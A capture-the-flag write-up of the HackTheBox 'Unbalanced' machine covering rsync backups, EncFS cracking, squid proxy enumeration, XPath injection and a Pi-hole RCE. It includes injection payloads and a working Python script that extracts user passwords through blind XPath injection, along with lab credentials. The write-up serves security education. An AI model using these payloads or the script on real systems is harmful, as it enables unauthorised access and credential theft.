22. HackTheBox. Level Hard: Passing Unbalanced. Rsync, EncFS, Squid, XPath injection and RCE in Pi-hole

24 December 2024 5 minutes Author: Lady Liberty

We look at how professional security testers and hackers find and exploit vulnerabilities in systems. Using the Unbalanced virtual machine, which is presented on the HackTheBox platform, we describe a detailed attack process that will help you understand the principles of how such techniques work and protect your own data.

Passage of Unbalanced

We continue publishing solutions sent for improvement of machines from the HackTheBox platform. The article discusses rsync backups, password selection for EncFS, working with the squid proxy server, exploiting XPath injection, and using RCE in Pi-hole.

Recon

This machine has an IP address of 10.10.10.200, which I add to /etc/hosts.

10.10.10.200 	unbalanced.htb

First, open ports are scanned. This is done using a script that takes one argument — the address of the host being analyzed:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

The scan detected SSH, rsync, and squid proxy services. Rsync is a program for UNIX-like systems that synchronizes files and directories in two locations with minimal bandwidth usage. It allows you to copy or list the contents of directories, and copy files with compression and recursion options.

Next, you will be shown a list of available modules.

rsync --list-only rsync://unbalanced.htb:873

Copy conf_backups.

rsync -av rsync://unbalanced.htb:873/conf_backups conf_backups

Finding the .encfs6.xml file indicates the presence of an EncFS encrypted volume. The next step is to obtain the password hash.

Let’s go over it.

This way we get the password used to encrypt the partition. All that remains is to mount the partition.

And we get the usual list of files.

These are mostly configuration files, and we are most interested in squid.conf. Let’s look at all the uncommented lines.

cat squid.conf | grep -v '^#' | uniq

The password is saved and the new domain name is added to the /etc/hosts file. The ACLs are then scanned for further analysis.

10.10.10.200    intranet.unbalanced.htb

Let’s install a proxy in the browser and contact the web server using the found domain name.

An authorization form appears on the screen. After some time spent analyzing it, it was decided to continue working with squid for further research..

Entry Point

Let’s take a look at the available options.

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep -v 'disabled'

We can find more domain names.

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache

There are three more names. Let’s add them to /etc/hosts (the last one was chosen logically).

172.31.179.2    intranet-host2.unbalanced.htb 
172.31.179.3    intranet-host3.unbalanced.htb
172.31.179.1    intranet.unbalanced.htb

At first glance, we see that this site is a temporary solution.

Next, we come to this authorization form.

USER

We test it again and get a response to the query ‘or”=’.

A list of users is obtained using XPath injection. Using special queries, the passwords for the corresponding names can be found.

First, the length of the password is determined using the string-length function. A login is used for testing: it is known that the password length is 5. The condition for lengths 4 and 5 is checked to see the difference.

The difference is noticeable. After determining the length of the password, you can get the password one character at a time. For this, login testing is also used: first the first letter is checked, comparing it with a, and then with b.

The difference is also noticeable. The next step will be to write code that automates the process of trying all passwords for each login.

import requests
import string

url = 'http://172.31.179.1/intranet.php'
proxies = {'http':'http://10.10.10.200:3128'}
users = ['bryan','sarah', 'jim', 'rita']

pass_str_len = "' or Username='USER' and string-length(Password)='"
pass_str_chr = "' or Username='USER' and substring(Password,NUM,1)='"

for user in users:
    for l in range(1,25):
        data = {'Username': '', 'Password': pass_str_len.replace('USER', user) + str(l) }
        request = requests.post(url=url, data=data, proxies=proxies)
        print('(' + str(l) + ') ' + user + ' : ' + ' '*10, end="\r")
        if 'Invalid credentials.' not in request.text:
            passwd = ''
            for num in range(l):
                for c in string.printable[:94]:
                    data = {'Username': '', 'Password': pass_str_chr.replace('USER', user).replace('NUM', str(num+1)) + c }
                    request = requests.post(url=url, data=data, proxies=proxies)
                    print('(' + str(l) + ') ' + user + ' : ' + passwd + c +' '*10, end='\r')
                    if 'Invalid credentials.' not in request.text:
                        passwd += c
                        break
            print(user +" : "+ passwd + " "*10)
            break

The first user gains access to SSH using the found password.

ROOT

In the user’s home directory we find the TODO list.

We see that the tasks related to Pi-hole (password admin) have been completed. But we couldn’t view the open ports because we don’t have netstat. Then we can use this script.

Ports 8080 and 5553 are open.

Another domain and its corresponding IP address are found in the response. Next, port forwarding is configured, after which the request is made via the browser.

ssh -L 8080:127.0.0.1:8080 [email protected]

Go to the page and log in with the password admin.

Let’s look at the exploit.

We launch the listener, after which the exploit is executed to further gain access.

The root directory files are browsed to find the script mentioned in the TODO sheet.

A password was detected in the script.

Conclusion

The article discusses methods for working with the HackTheBox machine: using rsync, password selection for EncFS, working with squid, XPath injection and RCE exploitation in Pi-hole. A list of users, SSH access, a new domain and a script with a password are obtained. The techniques used demonstrate the importance of updating systems and protecting data.

Found an error?
If you find an error, take a screenshot and send it to the bot.